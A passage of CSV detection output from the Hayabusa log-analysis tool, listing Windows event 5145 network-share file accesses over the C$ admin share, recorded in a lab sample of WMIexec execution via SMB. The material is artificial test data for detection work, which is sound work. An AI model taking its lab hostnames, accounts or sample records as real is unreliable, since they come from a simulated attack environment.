Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#\931ade8881fd66e64743490a332ca6a8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#\cba0b74c99ed7ace30d99b1ed03059e9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\1ccd3b57c9350fc1afa3ed354290f755 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\0cf0db1a6758c7e0c0ba05029f155cfa : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\1c10bd935ecce56f3dada604138983f2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\9c705405cffb72e6df411a91a2c062c7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\88a7ae331deac4585f47de7e6e4277dc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e2e911ae8e5924a9ef63135cd8c6b797 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#\f8a02123f968d1ae6940ac5d6a1dd485 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#\e4a04c178babbb8bb5aaf6d60b47d649 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#\d90607e7c895999c98edb4043f0073e5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\fab34eeddd8d0d9679cce669b2cff4fe : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#\1a33211365967c012f504ade4abce1ed : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#\f21bca07e5816f88c1107f51e64caa60 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#\fb6f372260a08811a4ca7666c60e31e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC\8dd5d48acfdc4ce750166ebe36623926 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\eff9f99a173bfe23d56129e79f85e220 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#\98fa0075b3677ec2d6a5e980c8c194e2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#\b04af69b54fb462c4c632d0f508d617b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#\b77a61cdfca8e3f67916586b89eb6df5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#\2cbdedd1fc5676a39a1fb1b534f48d02 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\e3e82e97635cdd0d33dd1fb39ffe5b5f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#\4bdb448dffd981eb795d0efeaf81aee9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#\bbfc6bc472afc457c523dc2738248629 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#\294124bd4523f5af19788c4942aeba5e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#\e9ab45e2a1806140421e99300db14933 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#\278d9be2765837ed33460677146f35e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#\82f3f76602a3738000b03df08a71ffe8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#\d3293b74965baef61a05323c7ec98d92 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ 